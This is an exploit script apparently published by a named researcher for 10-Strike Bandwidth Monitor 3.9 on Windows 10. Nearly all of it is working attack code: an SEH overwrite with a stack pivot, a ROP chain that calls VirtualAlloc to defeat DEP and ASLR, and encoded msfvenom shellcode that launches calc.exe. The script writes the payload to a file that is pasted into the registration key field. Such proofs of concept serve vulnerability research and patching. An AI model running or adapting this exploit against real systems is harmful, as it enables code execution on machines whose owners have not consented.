# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - ROP VirtualAlloc - Buffer Overflow (SEH,DEP,ASLR)
# Exploit Author: Bobby Cooke
# Date: June 7th, 2020
# Vendor Site: https://www.10-strike.com/
# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: version 3.9
# Exploit Details:
# 1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection.
# 2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time.
# - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
# 3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Protection (DEP) using Return Orientation Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR.
# 4. A pointer to the VirtualAlloc symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call VirtualAlloc and Bypass DEP.
# 5. Pass execution to shellcode and PopCalc.
# - Bad Characters: \x00 => \x20 ; \x0D & \x0A => Truncates buffer
# Recreate:
# Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
# Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename
# -------------------------------------------------------------------------------------------
# 0x12000000 | 0x12057000 | False | True | False | False | False | [ssleay32.dll]
# 0x00400000 | 0x01247000 | False | False | False | False | False | [BandMonitor.exe]
# 0x11000000 | 0x11155000 | False | True | False | False | False | [LIBEAY32.dll]
# -------------------------------------------------------------------------------------------
import struct
OS_retSled = '\x41'*400
retSled = '\x24\x01\x06\x11'*100 #11060124 # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ}
# EAX 110E7198 <&KERNEL32.VirtualAlloc>
# ECX 00000040
# EDX 00001000
# EBX 00000001
# ESP 0014EAA4
# EBP 1202EF02 ssleay32.1202EF02
# ESI 110495EF LIBEAY32.110495EF
# EDI 01225803 BandMoni.01225803
# EIP 76C647D0 KERNEL32.VirtualAlloc
# 0014EAA0 110495EF .... LIBEAY32.110495EF
# 0014EAA4 1202EF02 .... /CALL to VirtualAlloc
# 0014EAA8 0014EABC .... |Address = 0014EABC
# 0014EAAC 00000001 .... |Size = 1
# 0014EAB0 00001000 .... |AllocationType = MEM_COMMIT
# 0014EAB4 00000040 @... \Protect = PAGE_EXECUTE_READWRITE
# 0014EAB8 110E7198 .q.. <&KERNEL32.VirtualAlloc>
# 0014EABC 110843B4 .C.. LIBEAY32.110843B4
# 0014EAC0 90909090 ....
def createRopChain():
# rop chain generated with mona.py - www.corelan.be
ropGadgets = [
0x1202ef02, # POP EBP # RETN [ssleay32.dll]
0x1202ef02, # skip 4 bytes [ssleay32.dll]
0x01215f16, # POP EBX # RETN [BandMonitor.exe]
0xffffffff, #
0x012175f5, # INC EBX # RETN [BandMonitor.exe]
0x01056ff7, # INC EBX # RETN [BandMonitor.exe]
0x011e94d4, # POP EDX # RETN [BandMonitor.exe]
0xffffefff, # Value to negate, destination value : 0x00001000
0x01218952, # NEG EDX # RETN [BandMonitor.exe]
0x011ead1b, # DEC EDX # RETN [BandMonitor.exe]
0x110c5b5e, # POP ECX # RETN [LIBEAY32.dll]
0xffffffff, #
0x11016023, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1202fe55, # POP EDI # RETN [ssleay32.dll]
0x01225803, # RETN (ROP NOP) [BandMonitor.exe]
0x1105ed16, # POP ESI # RETN [LIBEAY32.dll]
0x110495ef, # JMP [EAX] [LIBEAY32.dll]
0x012126f5, # POP EAX # RETN [BandMonitor.exe]
0x110e7198, # ptr to &VirtualAlloc() [IAT LIBEAY32.dll]
0x110762c4, # PUSHAD # RETN [LIBEAY32.dll]
0x110843b4, # ptr to 'push esp # ret ' [LIBEAY32.dll]
]
return ''.join(struct.pack('<I', _) for _ in ropGadgets)
ropChain = createRopChain()
nopSled = '\x90'*100
# boku@kali# msfvenom -p windows/exec CMD='calc.exe' -b '\x00\x0d\x0a' -v shellcode -a x86 -f python --platform windows
# x86/shikata_ga_nai chosen with final size 220
shellcode = b""
shellcode += b"\xbf\xd2\xa1\xc4\xd3\xda\xdb\xd9\x74\x24\xf4"
shellcode += b"\x5e\x31\xc9\xb1\x31\x83\xc6\x04\x31\x7e\x0f"
shellcode += b"\x03\x7e\xdd\x43\x31\x2f\x09\x01\xba\xd0\xc9"
shellcode += b"\x66\x32\x35\xf8\xa6\x20\x3d\xaa\x16\x22\x13"
shellcode += b"\x46\xdc\x66\x80\xdd\x90\xae\xa7\x56\x1e\x89"
shellcode += b"\x86\x67\x33\xe9\x89\xeb\x4e\x3e\x6a\xd2\x80"
shellcode += b"\x33\x6b\x13\xfc\xbe\x39\xcc\x8a\x6d\xae\x79"
shellcode += b"\xc6\xad\x45\x31\xc6\xb5\xba\x81\xe9\x94\x6c"
shellcode += b"\x9a\xb3\x36\x8e\x4f\xc8\x7e\x88\x8c\xf5\xc9"
shellcode += b"\x23\x66\x81\xcb\xe5\xb7\x6a\x67\xc8\x78\x99"
shellcode += b"\x79\x0c\xbe\x42\x0c\x64\xbd\xff\x17\xb3\xbc"
shellcode += b"\xdb\x92\x20\x66\xaf\x05\x8d\x97\x7c\xd3\x46"
shellcode += b"\x9b\xc9\x97\x01\xbf\xcc\x74\x3a\xbb\x45\x7b"
shellcode += b"\xed\x4a\x1d\x58\x29\x17\xc5\xc1\x68\xfd\xa8"
shellcode += b"\xfe\x6b\x5e\x14\x5b\xe7\x72\x41\xd6\xaa\x18"
shellcode += b"\x94\x64\xd1\x6e\x96\x76\xda\xde\xff\x47\x51"
shellcode += b"\xb1\x78\x58\xb0\xf6\x77\x12\x99\x5e\x10\xfb"
shellcode += b"\x4b\xe3\x7d\xfc\xa1\x27\x78\x7f\x40\xd7\x7f"
shellcode += b"\x9f\x21\xd2\xc4\x27\xd9\xae\x55\xc2\xdd\x1d"
shellcode += b"\x55\xc7\xbd\xc0\xc5\x8b\x6f\x67\x6e\x29\x70"
OS_nSEH = '\x43'*(4188-600-200-len(ropChain+nopSled+shellcode))
nSEH = '\x44'*4
# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
SEH = '\x70\x28\x21\x01' # 0x01212870 : {pivot 2064 / 0x810}
extra = '\x44'*2000
buffer = OS_retSled + retSled + ropChain + nopSled + shellcode + OS_nSEH + nSEH + SEH + extra
File = 'poc.txt'
try:
payload = buffer
f = open(File, 'w')
f.write(payload)
f.close()
print File + " created successfully"
except:
print File + ' failed to create'